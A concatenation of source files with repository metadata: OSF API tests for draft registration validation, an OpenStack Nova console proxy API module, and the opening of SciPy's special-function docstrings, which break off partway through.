url = '/{}nodes/{}/draft_registrations/'.format(API_BASE, collection._id)
res = app.post_json_api(url, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 404
def test_required_metaschema_questions_not_required_on_post(self, app, user, project_public, prereg_metadata):
prereg_schema = MetaSchema.objects.get(name='Prereg Challenge', schema_version=LATEST_SCHEMA_VERSION)
prereg_draft_registration = DraftRegistrationFactory(
initiator=user,
registration_schema=prereg_schema,
branched_from=project_public
)
url = '/{}nodes/{}/draft_registrations/?embed=initiator&embed=branched_from'.format(API_BASE, project_public._id)
registration_metadata = prereg_metadata(prereg_draft_registration)
del registration_metadata['q1']
prereg_draft_registration.registration_metadata = registration_metadata
prereg_draft_registration.save()
payload = {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': prereg_schema._id,
'registration_metadata': registration_metadata
}
}
}
res = app.post_json_api(url, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 201
data = res.json['data']
assert res.json['data']['attributes']['registration_metadata']['q2']['value'] == 'Test response'
assert data['attributes']['registration_supplement'] == prereg_schema._id
assert data['embeds']['branched_from']['data']['id'] == project_public._id
assert data['embeds']['initiator']['data']['id'] == user._id
def test_registration_supplement_must_be_supplied(self, app, user, url_draft_registrations):
draft_data = {
'data': {
'type': 'draft_registrations',
'attributes': {
}
}
}
res = app.post_json_api(url_draft_registrations, draft_data, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'This field is required.'
assert errors['source']['pointer'] == '/data/attributes/registration_supplement'
def test_registration_metadata_must_be_a_dictionary(self, app, user, payload, url_draft_registrations):
payload['data']['attributes']['registration_metadata'] = 'Registration data'
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['source']['pointer'] == '/data/attributes/registration_metadata'
assert errors['detail'] == 'Expected a dictionary of items but got type "unicode".'
def test_registration_metadata_question_values_must_be_dictionaries(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = 'No, data collection has not begun'
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'No, data collection has not begun\' is not of type \'object\''
def test_registration_metadata_question_keys_must_be_value(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'incorrect_key': 'No, data collection has not begun'
}
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'incorrect_key\' was unexpected)'
def test_question_in_registration_metadata_must_be_in_schema(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['q11'] = {
'value': 'No, data collection has not begun'
}
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'Additional properties are not allowed (u\'q11\' was unexpected)'
def test_multiple_choice_question_value_must_match_value_in_schema(self, app, user, payload, url_draft_registrations):
schema = MetaSchema.objects.get(name='OSF-Standard Pre-Data Collection Registration', schema_version=LATEST_SCHEMA_VERSION)
payload['data']['attributes']['registration_supplement'] = schema._id
payload['data']['attributes']['registration_metadata'] = {}
payload['data']['attributes']['registration_metadata']['datacompletion'] = {
'value': 'Nope, data collection has not begun'
}
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
errors = res.json['errors'][0]
assert res.status_code == 400
assert errors['detail'] == 'u\'Nope, data collection has not begun\' is not one of [u\'No, data collection has not begun\', u\'Yes, data collection is underway or complete\']'
def test_reviewer_cannot_create_draft_registration(self, app, user_read_contrib, project_public, payload, url_draft_registrations):
user = AuthUserFactory()
user.add_system_tag(PREREG_ADMIN_TAG)
user.save()
assert user_read_contrib in project_public.contributors.all()
res = app.post_json_api(url_draft_registrations, payload, auth=user.auth, expect_errors=True)
assert res.status_code == 403
| {
"content_hash": "593a2f2132768e81ea02ce80efafca5d",
"timestamp": "",
"source": "github",
"line_count": 379,
"max_line_length": 183,
"avg_line_length": 46.6490765171504,
"alnum_prop": 0.6463800904977376,
"repo_name": "chrisseto/osf.io",
"id": "e7a02770d512911796f9a237195cf4b58f2e98da",
"size": "17680",
"binary": false,
"copies": "2",
"ref": "refs/heads/feature/reviews",
"path": "api_tests/nodes/views/test_node_draft_registration_list.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "144093"
},
{
"name": "HTML",
"bytes": "211713"
},
{
"name": "JavaScript",
"bytes": "1740074"
},
{
"name": "Mako",
"bytes": "592713"
},
{
"name": "Perl",
"bytes": "13885"
},
{
"name": "Python",
"bytes": "7895181"
}
],
"symlink_target": ""
} |
"""Handles ConsoleProxy API requests."""
from oslo.config import cfg
from nova.compute import rpcapi as compute_rpcapi
from nova.console import rpcapi as console_rpcapi
from nova.db import base
from nova.openstack.common import rpc
from nova.openstack.common import uuidutils
CONF = cfg.CONF
CONF.import_opt('console_topic', 'nova.console.rpcapi')
class API(base.Base):
"""API for spinning up or down console proxy connections."""
def __init__(self, **kwargs):
super(API, self).__init__(**kwargs)
def get_consoles(self, context, instance_uuid):
return self.db.console_get_all_by_instance(context, instance_uuid)
def get_console(self, context, instance_uuid, console_uuid):
return self.db.console_get(context, console_uuid, instance_uuid)
def delete_console(self, context, instance_uuid, console_uuid):
console = self.db.console_get(context, console_uuid, instance_uuid)
topic = rpc.queue_get_for(context, CONF.console_topic,
console['pool']['host'])
rpcapi = console_rpcapi.ConsoleAPI(topic=topic)
rpcapi.remove_console(context, console['id'])
def create_console(self, context, instance_uuid):
#NOTE(mdragon): If we wanted to return the console info
#               here, we would need to do a call.
# They can just do an index later to fetch
# console info. I am not sure which is better
# here.
instance = self._get_instance(context, instance_uuid)
topic = self._get_console_topic(context, instance['host'])
rpcapi = console_rpcapi.ConsoleAPI(topic=topic)
rpcapi.add_console(context, instance['id'])
def _get_console_topic(self, context, instance_host):
rpcapi = compute_rpcapi.ComputeAPI()
return rpcapi.get_console_topic(context, instance_host)
def _get_instance(self, context, instance_uuid):
if uuidutils.is_uuid_like(instance_uuid):
instance = self.db.instance_get_by_uuid(context, instance_uuid)
else:
instance = self.db.instance_get(context, instance_uuid)
return instance
def get_backdoor_port(self, context, host):
topic = self._get_console_topic(context, host)
rpcapi = console_rpcapi.ConsoleAPI(topic=topic)
return rpcapi.get_backdoor_port(context, host)
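# Usage sketch (hypothetical `context` and `instance_uuid`; not part of the API):
#   api = API()
#   consoles = api.get_consoles(context, instance_uuid)
#   for console in consoles:
#       api.delete_console(context, instance_uuid, console['id'])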
| {
"content_hash": "b3fd7f2ba001ee15c4d60d4be56d5840",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 75,
"avg_line_length": 40.983050847457626,
"alnum_prop": 0.6559139784946236,
"repo_name": "zestrada/nova-cs498cc",
"id": "91966a7ff7dd9efe77fe5fcaf50739781308afbe",
"size": "3103",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "nova/console/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "9215416"
},
{
"name": "Shell",
"bytes": "17117"
}
],
"symlink_target": ""
} |
from __future__ import division, print_function, absolute_import
docdict = {}
def get(name):
return docdict.get(name)
def add_newdoc(place, name, doc):
docdict['.'.join((place, name))] = doc
add_newdoc("scipy.special", "_lambertw",
"""
Internal function, use `lambertw` instead.
""")
add_newdoc("scipy.special", "airy",
"""
airy(z)
Airy functions and their derivatives.
Parameters
----------
z : float or complex
Argument.
Returns
-------
Ai, Aip, Bi, Bip
Airy functions Ai and Bi, and their derivatives Aip and Bip
Notes
-----
The Airy functions Ai and Bi are two independent solutions of y''(x) = x y.
""")
add_newdoc("scipy.special", "airye",
"""
airye(z)
Exponentially scaled Airy functions and their derivatives.
Scaling::
eAi = Ai * exp(2.0/3.0*z*sqrt(z))
eAip = Aip * exp(2.0/3.0*z*sqrt(z))
eBi = Bi * exp(-abs((2.0/3.0*z*sqrt(z)).real))
eBip = Bip * exp(-abs((2.0/3.0*z*sqrt(z)).real))
Parameters
----------
z : float or complex
Argument.
Returns
-------
eAi, eAip, eBi, eBip
Airy functions Ai and Bi, and their derivatives Aip and Bip
""")
add_newdoc("scipy.special", "bdtr",
"""
bdtr(k, n, p)
Binomial distribution cumulative distribution function.
Sum of the terms 0 through k of the Binomial probability density.
::
y = sum(nCj p**j (1-p)**(n-j),j=0..k)
Parameters
----------
k, n : int
Terms to include
p : float
Probability
Returns
-------
y : float
Sum of terms
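Examples
--------
A quick sanity check against the definition:
>>> from scipy.special import bdtr
>>> bdtr(1, 3, 0.5)   # 3C0*0.5**3 + 3C1*0.5**3
0.5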
""")
add_newdoc("scipy.special", "bdtrc",
"""
bdtrc(k, n, p)
Binomial distribution survival function.
Sum of the terms k+1 through n of the Binomial probability density
::
y = sum(nCj p**j (1-p)**(n-j), j=k+1..n)
Parameters
----------
k, n : int
Terms to include
p : float
Probability
Returns
-------
y : float
Sum of terms
""")
add_newdoc("scipy.special", "bdtri",
"""
bdtri(k, n, y)
Inverse function to bdtr vs. p
Finds probability `p` such that for the cumulative binomial
probability ``bdtr(k, n, p) == y``.
""")
add_newdoc("scipy.special", "bdtrik",
"""
bdtrik(y, n, p)
Inverse function to bdtr vs k
""")
add_newdoc("scipy.special", "bdtrin",
"""
bdtrin(k, y, p)
Inverse function to bdtr vs n
""")
add_newdoc("scipy.special", "binom",
"""
binom(n, k)
Binomial coefficient
""")
add_newdoc("scipy.special", "btdtria",
"""
btdtria(p, b, x)
Inverse of btdtr vs a
""")
add_newdoc("scipy.special", "btdtrib",
"""
btdtria(a, p, x)
Inverse of btdtr vs b
""")
add_newdoc("scipy.special", "bei",
"""
bei(x)
Kelvin function bei
""")
add_newdoc("scipy.special", "beip",
"""
beip(x)
Derivative of the Kelvin function bei
""")
add_newdoc("scipy.special", "ber",
"""
ber(x)
Kelvin function ber.
""")
add_newdoc("scipy.special", "berp",
"""
berp(x)
Derivative of the Kelvin function ber
""")
add_newdoc("scipy.special", "besselpoly",
r"""
besselpoly(a, lmb, nu)
Weighed integral of a Bessel function.
.. math::
\int_0^1 x^\lambda J_\nu(2 a x) \, dx
where :math:`J_\nu` is a Bessel function and :math:`\lambda=lmb`,
:math:`\nu=nu`.
""")
add_newdoc("scipy.special", "beta",
"""
beta(a, b)
Beta function.
::
beta(a,b) = gamma(a) * gamma(b) / gamma(a+b)
""")
add_newdoc("scipy.special", "betainc",
"""
betainc(a, b, x)
Incomplete beta integral.
Compute the incomplete beta integral of the arguments, evaluated
from zero to x::
gamma(a+b) / (gamma(a)*gamma(b)) * integral(t**(a-1) (1-t)**(b-1), t=0..x).
Notes
-----
The incomplete beta is also sometimes defined without the terms
in gamma, in which case the above definition is the so-called regularized
incomplete beta. Under this definition, you can get the incomplete beta by
multiplying the result of the scipy function by beta(a, b).
""")
add_newdoc("scipy.special", "betaincinv",
"""
betaincinv(a, b, y)
Inverse function to beta integral.
Compute x such that betainc(a,b,x) = y.
""")
add_newdoc("scipy.special", "betaln",
"""
betaln(a, b)
Natural logarithm of absolute value of beta function.
Computes ``ln(abs(beta(x)))``.
""")
add_newdoc("scipy.special", "boxcox",
"""
boxcox(x, lmbda)
Compute the Box-Cox transformation.
The Box-Cox transformation is::
y = (x**lmbda - 1) / lmbda if lmbda != 0
log(x) if lmbda == 0
Returns `nan` if ``x < 0``.
Returns `-inf` if ``x == 0`` and ``lmbda < 0``.
.. versionadded:: 0.14.0
Parameters
----------
x : array_like
Data to be transformed.
lmbda : array_like
Power parameter of the Box-Cox transform.
Returns
-------
y : array
Transformed data.
Examples
--------
>>> boxcox([1, 4, 10], 2.5)
array([ 0. , 12.4 , 126.09110641])
>>> boxcox(2, [0, 1, 2])
array([ 0.69314718, 1. , 1.5 ])
""")
add_newdoc("scipy.special", "boxcox1p",
"""
boxcox1p(x, lmbda)
Compute the Box-Cox transformation of 1 + `x`.
The Box-Cox transformation computed by `boxcox1p` is::
y = ((1+x)**lmbda - 1) / lmbda if lmbda != 0
log(1+x) if lmbda == 0
Returns `nan` if ``x < -1``.
Returns `-inf` if ``x == -1`` and ``lmbda < 0``.
.. versionadded:: 0.14.0
Parameters
----------
x : array_like
Data to be transformed.
lmbda : array_like
Power parameter of the Box-Cox transform.
Returns
-------
y : array
Transformed data.
Examples
--------
>> boxcox1p(1e-4, [0, 0.5, 1])
array([ 9.99950003e-05, 9.99975001e-05, 1.00000000e-04])
>>> boxcox1p([0.01, 0.1], 0.25)
array([ 0.00996272, 0.09645476])
""")
add_newdoc("scipy.special", "btdtr",
"""
btdtr(a,b,x)
Cumulative beta distribution.
Returns the area from zero to x under the beta density function::
gamma(a+b)/(gamma(a)*gamma(b)))*integral(t**(a-1) (1-t)**(b-1), t=0..x)
See Also
--------
betainc
""")
add_newdoc("scipy.special", "btdtri",
"""
btdtri(a,b,p)
p-th quantile of the beta distribution.
This is effectively the inverse of btdtr returning the value of x for which
``btdtr(a,b,x) = p``
See Also
--------
betaincinv
""")
add_newdoc("scipy.special", "cbrt",
"""
cbrt(x)
Cube root of x
""")
add_newdoc("scipy.special", "chdtr",
"""
chdtr(v, x)
Chi square cumulative distribution function
Returns the area under the left hand tail (from 0 to x) of the Chi
square probability density function with v degrees of freedom::
1/(2**(v/2) * gamma(v/2)) * integral(t**(v/2-1) * exp(-t/2), t=0..x)
""")
add_newdoc("scipy.special", "chdtrc",
"""
chdtrc(v,x)
Chi square survival function
Returns the area under the right hand tail (from x to
infinity) of the Chi square probability density function with v
degrees of freedom::
1/(2**(v/2) * gamma(v/2)) * integral(t**(v/2-1) * exp(-t/2), t=x..inf)
""")
add_newdoc("scipy.special", "chdtri",
"""
chdtri(v,p)
Inverse to chdtrc
Returns the argument x such that ``chdtrc(v,x) == p``.
""")
add_newdoc("scipy.special", "chdtriv",
"""
chdtriv(p, x)
Inverse to chdtr vs v
Returns the argument v such that ``chdtr(v, x) == p``.
""")
add_newdoc("scipy.special", "chndtr",
"""
chndtr(x, df, nc)
Non-central chi square cumulative distribution function
""")
add_newdoc("scipy.special", "chndtrix",
"""
chndtrix(p, df, nc)
Inverse to chndtr vs x
""")
add_newdoc("scipy.special", "chndtridf",
"""
chndtridf(x, p, nc)
Inverse to chndtr vs df
""")
add_newdoc("scipy.special", "chndtrinc",
"""
chndtrinc(x, df, p)
Inverse to chndtr vs nc
""")
add_newdoc("scipy.special", "cosdg",
"""
cosdg(x)
Cosine of the angle x given in degrees.
""")
add_newdoc("scipy.special", "cosm1",
"""
cosm1(x)
cos(x) - 1 for use when x is near zero.
""")
add_newdoc("scipy.special", "cotdg",
"""
cotdg(x)
Cotangent of the angle x given in degrees.
""")
add_newdoc("scipy.special", "dawsn",
"""
dawsn(x)
Dawson's integral.
Computes::
exp(-x**2) * integral(exp(t**2),t=0..x).
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "ellipe",
"""
ellipe(m)
Complete elliptic integral of the second kind
::
integral(sqrt(1-m*sin(t)**2),t=0..pi/2)
""")
add_newdoc("scipy.special", "ellipeinc",
"""
ellipeinc(phi,m)
Incomplete elliptic integral of the second kind
::
integral(sqrt(1-m*sin(t)**2),t=0..phi)
""")
add_newdoc("scipy.special", "ellipj",
"""
ellipj(u, m)
Jacobian elliptic functions
Calculates the Jacobian elliptic functions of parameter m between
0 and 1, and real u.
Parameters
----------
m, u
Parameters
Returns
-------
sn, cn, dn, ph
The returned functions::
sn(u|m), cn(u|m), dn(u|m)
The value ``ph`` is such that if ``u = ellik(ph, m)``,
then ``sn(u|m) = sin(ph)`` and ``cn(u|m) = cos(ph)``.
""")
add_newdoc("scipy.special", "ellipkm1",
"""
ellipkm1(p)
The complete elliptic integral of the first kind around m=1.
This function is defined as
.. math:: K(p) = \\int_0^{\\pi/2} [1 - m \\sin(t)^2]^{-1/2} dt
where `m = 1 - p`.
Parameters
----------
p : array_like
Defines the parameter of the elliptic integral as m = 1 - p.
Returns
-------
K : array_like
Value of the elliptic integral.
See Also
--------
ellipk
""")
add_newdoc("scipy.special", "ellipkinc",
"""
ellipkinc(phi, m)
Incomplete elliptic integral of the first kind
::
integral(1/sqrt(1-m*sin(t)**2),t=0..phi)
""")
add_newdoc("scipy.special", "erf",
"""
erf(z)
Returns the error function of complex argument.
It is defined as ``2/sqrt(pi)*integral(exp(-t**2), t=0..z)``.
Parameters
----------
x : ndarray
Input array.
Returns
-------
res : ndarray
The values of the error function at the given points x.
See Also
--------
erfc, erfinv, erfcinv
Notes
-----
The cumulative of the unit normal distribution is given by
``Phi(z) = 1/2[1 + erf(z/sqrt(2))]``.
References
----------
.. [1] http://en.wikipedia.org/wiki/Error_function
.. [2] Milton Abramowitz and Irene A. Stegun, eds.
Handbook of Mathematical Functions with Formulas,
Graphs, and Mathematical Tables. New York: Dover,
1972. http://www.math.sfu.ca/~cbm/aands/page_297.htm
.. [3] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "erfc",
"""
erfc(x)
Complementary error function, 1 - erf(x).
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "erfi",
"""
erfi(z)
Imaginary error function, -i erf(i z).
.. versionadded:: 0.12.0
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "erfcx",
"""
erfcx(x)
Scaled complementary error function, exp(x^2) erfc(x).
.. versionadded:: 0.12.0
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "eval_jacobi",
"""
eval_jacobi(n, alpha, beta, x, out=None)
Evaluate Jacobi polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_jacobi",
"""
eval_sh_jacobi(n, p, q, x, out=None)
Evaluate shifted Jacobi polynomial at a point.
""")
add_newdoc("scipy.special", "eval_gegenbauer",
"""
eval_gegenbauer(n, alpha, x, out=None)
Evaluate Gegenbauer polynomial at a point.
""")
add_newdoc("scipy.special", "eval_chebyt",
"""
eval_chebyt(n, x, out=None)
Evaluate Chebyshev T polynomial at a point.
This routine is numerically stable for `x` in ``[-1, 1]`` at least
up to order ``10000``.
""")
add_newdoc("scipy.special", "eval_chebyu",
"""
eval_chebyu(n, x, out=None)
Evaluate Chebyshev U polynomial at a point.
""")
add_newdoc("scipy.special", "eval_chebys",
"""
eval_chebys(n, x, out=None)
Evaluate Chebyshev S polynomial at a point.
""")
add_newdoc("scipy.special", "eval_chebyc",
"""
eval_chebyc(n, x, out=None)
Evaluate Chebyshev C polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_chebyt",
"""
eval_sh_chebyt(n, x, out=None)
Evaluate shifted Chebyshev T polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_chebyu",
"""
eval_sh_chebyu(n, x, out=None)
Evaluate shifted Chebyshev U polynomial at a point.
""")
add_newdoc("scipy.special", "eval_legendre",
"""
eval_legendre(n, x, out=None)
Evaluate Legendre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_sh_legendre",
"""
eval_sh_legendre(n, x, out=None)
Evaluate shifted Legendre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_genlaguerre",
"""
eval_genlaguerre(n, alpha, x, out=None)
Evaluate generalized Laguerre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_laguerre",
"""
eval_laguerre(n, x, out=None)
Evaluate Laguerre polynomial at a point.
""")
add_newdoc("scipy.special", "eval_hermite",
"""
eval_hermite(n, x, out=None)
Evaluate Hermite polynomial at a point.
""")
add_newdoc("scipy.special", "eval_hermitenorm",
"""
eval_hermitenorm(n, x, out=None)
Evaluate normalized Hermite polynomial at a point.
""")
add_newdoc("scipy.special", "exp1",
"""
exp1(z)
Exponential integral E_1 of complex argument z
::
integral(exp(-z*t)/t,t=1..inf).
""")
add_newdoc("scipy.special", "exp10",
"""
exp10(x)
10**x
""")
add_newdoc("scipy.special", "exp2",
"""
exp2(x)
2**x
""")
add_newdoc("scipy.special", "expi",
"""
expi(x)
Exponential integral Ei
Defined as::
integral(exp(t)/t,t=-inf..x)
See `expn` for a different exponential integral.
""")
add_newdoc('scipy.special', 'expit',
"""
expit(x)
Expit ufunc for ndarrays.
The expit function, also known as the logistic function, is defined as
expit(x) = 1/(1+exp(-x)). It is the inverse of the logit function.
.. versionadded:: 0.10.0
Parameters
----------
x : ndarray
The ndarray to apply expit to element-wise.
Returns
-------
out : ndarray
An ndarray of the same shape as x. Its entries
are expit of the corresponding entry of x.
Notes
-----
As a ufunc expit takes a number of optional
keyword arguments. For more information
see `ufuncs <http://docs.scipy.org/doc/numpy/reference/ufuncs.html>`_
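Examples
--------
A basic check of the definition, ``expit(0) = 1/(1 + exp(0)) = 0.5``:
>>> from scipy.special import expit
>>> expit(0)
0.5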
""")
add_newdoc("scipy.special", "expm1",
"""
expm1(x)
exp(x) - 1 for use when x is near zero.
""")
add_newdoc("scipy.special", "expn",
"""
expn(n, x)
Exponential integral E_n
Returns the exponential integral for non-negative integer n and non-negative x::
integral(exp(-x*t) / t**n, t=1..inf).
""")
add_newdoc("scipy.special", "fdtr",
"""
fdtr(dfn, dfd, x)
F cumulative distribution function
Returns the area from zero to x under the F density function (also
known as Snedecor's density or the variance ratio density). This
is the density of X = (unum/dfn)/(uden/dfd), where unum and uden
are random variables having Chi square distributions with dfn and
dfd degrees of freedom, respectively.
""")
add_newdoc("scipy.special", "fdtrc",
"""
fdtrc(dfn, dfd, x)
F survival function
Returns the complemented F distribution function.
""")
add_newdoc("scipy.special", "fdtri",
"""
fdtri(dfn, dfd, p)
Inverse to fdtr vs x
Finds the F density argument x such that ``fdtr(dfn, dfd, x) == p``.
""")
add_newdoc("scipy.special", "fdtridfd",
"""
fdtridfd(dfn, p, x)
Inverse to fdtr vs dfd
Finds the F density argument dfd such that ``fdtr(dfn,dfd,x) == p``.
""")
add_newdoc("scipy.special", "fdtridfn",
"""
fdtridfn(p, dfd, x)
Inverse to fdtr vs dfn
Finds the F density argument dfn such that ``fdtr(dfn,dfd,x) == p``.
""")
add_newdoc("scipy.special", "fresnel",
"""
fresnel(z)
Fresnel sin and cos integrals
Defined as::
ssa = integral(sin(pi/2 * t**2),t=0..z)
csa = integral(cos(pi/2 * t**2),t=0..z)
Parameters
----------
z : float or complex array_like
Argument
Returns
-------
ssa, csa
Fresnel sin and cos integral values
""")
add_newdoc("scipy.special", "gamma",
"""
gamma(z)
Gamma function
The gamma function is often referred to as the generalized
factorial since ``z*gamma(z) = gamma(z+1)`` and ``gamma(n+1) =
n!`` for natural number *n*.
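Examples
--------
The factorial relation gives ``gamma(5) == 4! == 24``:
>>> from scipy.special import gamma
>>> gamma(5)
24.0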
""")
add_newdoc("scipy.special", "gammainc",
"""
gammainc(a, x)
Incomplete gamma function
Defined as::
1 / gamma(a) * integral(exp(-t) * t**(a-1), t=0..x)
`a` must be positive and `x` must be >= 0.
""")
add_newdoc("scipy.special", "gammaincc",
"""
gammaincc(a,x)
Complemented incomplete gamma integral
Defined as::
1 / gamma(a) * integral(exp(-t) * t**(a-1), t=x..inf) = 1 - gammainc(a,x)
`a` must be positive and `x` must be >= 0.
""")
add_newdoc("scipy.special", "gammainccinv",
"""
gammainccinv(a,y)
Inverse to gammaincc
Returns `x` such that ``gammaincc(a,x) == y``.
""")
add_newdoc("scipy.special", "gammaincinv",
"""
gammaincinv(a, y)
Inverse to gammainc
Returns `x` such that ``gammainc(a, x) = y``.
""")
add_newdoc("scipy.special", "gammaln",
"""
gammaln(z)
Logarithm of absolute value of gamma function
Defined as::
ln(abs(gamma(z)))
See Also
--------
gammasgn
""")
add_newdoc("scipy.special", "gammasgn",
"""
gammasgn(x)
Sign of the gamma function.
See Also
--------
gammaln
""")
add_newdoc("scipy.special", "gdtr",
"""
gdtr(a,b,x)
Gamma distribution cumulative density function.
Returns the integral from zero to x of the gamma probability
density function::
a**b / gamma(b) * integral(t**(b-1) exp(-at),t=0..x).
The arguments a and b are used differently here than in other
definitions.
""")
add_newdoc("scipy.special", "gdtrc",
"""
gdtrc(a,b,x)
Gamma distribution survival function.
Integral from x to infinity of the gamma probability density
function.
See Also
--------
gdtr, gdtri
""")
add_newdoc("scipy.special", "gdtria",
"""
gdtria(p, b, x, out=None)
Inverse of gdtr vs a.
Returns the inverse with respect to the parameter `a` of ``p =
gdtr(a, b, x)``, the cumulative distribution function of the gamma
distribution.
Parameters
----------
p : array_like
Probability values.
b : array_like
`b` parameter values of `gdtr(a, b, x)`. `b` is the "shape" parameter
of the gamma distribution.
x : array_like
Nonnegative real values, from the domain of the gamma distribution.
out : ndarray, optional
If a fourth argument is given, it must be a numpy.ndarray whose size
matches the broadcast result of `p`, `b` and `x`. `out` is then the
array returned by the function.
Returns
-------
a : ndarray
Values of the `a` parameter such that `p = gdtr(a, b, x)`. `1/a`
is the "scale" parameter of the gamma distribution.
See Also
--------
gdtr : CDF of the gamma distribution.
gdtrib : Inverse with respect to `b` of `gdtr(a, b, x)`.
gdtrix : Inverse with respect to `x` of `gdtr(a, b, x)`.
Examples
--------
First evaluate `gdtr`.
>>> p = gdtr(1.2, 3.4, 5.6)
>>> print(p)
0.94378087442
Verify the inverse.
>>> gdtria(p, 3.4, 5.6)
1.2
""")
add_newdoc("scipy.special", "gdtrib",
"""
gdtrib(a, p, x, out=None)
Inverse of gdtr vs b.
Returns the inverse with respect to the parameter `b` of ``p =
gdtr(a, b, x)``, the cumulative distribution function of the gamma
distribution.
Parameters
----------
a : array_like
`a` parameter values of `gdtr(a, b, x)`. `1/a` is the "scale"
parameter of the gamma distribution.
p : array_like
Probability values.
x : array_like
Nonnegative real values, from the domain of the gamma distribution.
out : ndarray, optional
If a fourth argument is given, it must be a numpy.ndarray whose size
matches the broadcast result of `a`, `p` and `x`. `out` is then the
array returned by the function.
Returns
-------
b : ndarray
Values of the `b` parameter such that `p = gdtr(a, b, x)`. `b` is
the "shape" parameter of the gamma distribution.
See Also
--------
gdtr : CDF of the gamma distribution.
gdtria : Inverse with respect to `a` of `gdtr(a, b, x)`.
gdtrix : Inverse with respect to `x` of `gdtr(a, b, x)`.
Examples
--------
First evaluate `gdtr`.
>>> p = gdtr(1.2, 3.4, 5.6)
>>> print(p)
0.94378087442
Verify the inverse.
>>> gdtrib(1.2, p, 5.6)
3.3999999999723882
""")
add_newdoc("scipy.special", "gdtrix",
"""
gdtrix(a, b, p, out=None)
Inverse of gdtr vs x.
Returns the inverse with respect to the parameter `x` of ``p =
gdtr(a, b, x)``, the cumulative distribution function of the gamma
distribution. This is also known as the p'th quantile of the
distribution.
Parameters
----------
a : array_like
`a` parameter values of `gdtr(a, b, x)`. `1/a` is the "scale"
parameter of the gamma distribution.
b : array_like
`b` parameter values of `gdtr(a, b, x)`. `b` is the "shape" parameter
of the gamma distribution.
p : array_like
Probability values.
out : ndarray, optional
If a fourth argument is given, it must be a numpy.ndarray whose size
matches the broadcast result of `a`, `b` and `p`. `out` is then the
array returned by the function.
Returns
-------
x : ndarray
Values of the `x` parameter such that `p = gdtr(a, b, x)`.
See Also
--------
gdtr : CDF of the gamma distribution.
gdtria : Inverse with respect to `a` of `gdtr(a, b, x)`.
gdtrib : Inverse with respect to `b` of `gdtr(a, b, x)`.
Examples
--------
First evaluate `gdtr`.
>>> p = gdtr(1.2, 3.4, 5.6)
>>> print(p)
0.94378087442
Verify the inverse.
>>> gdtrix(1.2, 3.4, p)
5.5999999999999996
""")
add_newdoc("scipy.special", "hankel1",
"""
hankel1(v, z)
Hankel function of the first kind
Parameters
----------
v : float
Order
z : float or complex
Argument
""")
add_newdoc("scipy.special", "hankel1e",
"""
hankel1e(v, z)
Exponentially scaled Hankel function of the first kind
Defined as::
hankel1e(v,z) = hankel1(v,z) * exp(-1j * z)
Parameters
----------
v : float
Order
z : complex
Argument
""")
add_newdoc("scipy.special", "hankel2",
"""
hankel2(v, z)
Hankel function of the second kind
Parameters
----------
v : float
Order
z : complex
Argument
""")
add_newdoc("scipy.special", "hankel2e",
"""
hankel2e(v, z)
Exponentially scaled Hankel function of the second kind
Defined as::
hankel2e(v,z) = hankel2(v,z) * exp(1j * z)
Parameters
----------
v : float
Order
z : complex
Argument
""")
add_newdoc("scipy.special", "hyp1f1",
"""
hyp1f1(a, b, x)
Confluent hypergeometric function 1F1(a, b; x)
""")
add_newdoc("scipy.special", "hyp1f2",
"""
hyp1f2(a, b, c, x)
Hypergeometric function 1F2 and error estimate
Returns
-------
y
Value of the function
err
Error estimate
""")
add_newdoc("scipy.special", "hyp2f0",
"""
hyp2f0(a, b, x, type)
Hypergeometric function 2F0 in y and an error estimate
The parameter `type` determines a convergence factor and can be
either 1 or 2.
